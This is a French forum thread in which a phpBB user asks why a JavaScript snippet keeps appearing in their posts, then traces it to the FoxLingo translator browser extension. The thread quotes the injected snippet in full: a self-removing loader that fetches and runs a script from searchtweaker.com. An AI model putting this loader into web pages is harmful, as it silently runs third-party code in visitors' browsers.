problème à l'affichage

Voir le sujet précédent Voir le sujet suivant Aller en bas

Résolu problème à l'affichage

Message par le.cricket le Mar 11 Déc 2012 - 17:57

Sur mon forum : http://www.leschroniquesdebidfoly.com (phpBB2 (subsilver) )
Chaque fois que je poste un sujet en bas du cadre ou je mets -
"source : forum-actif" dessous ma dernière ligne s'affiche le texte suivant :

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

je ne suis pas informaticien, mais je pense qu'il s'agit d'un code HTML !!! ou BBcode ?

je suis donc obligé de poster mon sujet, d'éditer et d'effacer ces lignes de code pour avoir un texte "normal" ! Ce n'est pas trop gênant en soi mais à la longue ça agace ! merci pour vos réponses. Bonnes fêtes de fin d'année à tous. le.cricket

le.cricket
****

Masculin
Messages : 230
Inscrit(e) le : 09/10/2009

http://bidfoly.forumactif.com/
le.cricket a été remercié(e) par l'auteur de ce sujet.

Résolu problème à l'affichage

Message par le.cricket le Mar 11 Déc 2012 - 18:02

En fait je viens de comprendre que c'était l'extension traducteur "fox lingo" qui me sème la zizanie ! désolé d'avoir dérangé mais cette mésaventure peut servir à d'autres ! Bonnes fêtes de fin d'année à tous. Le.cricket Laughing

le.cricket
****

Masculin
Messages : 230
Inscrit(e) le : 09/10/2009

http://bidfoly.forumactif.com/
le.cricket a été remercié(e) par l'auteur de ce sujet.

Voir le sujet précédent Voir le sujet suivant Revenir en haut


Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum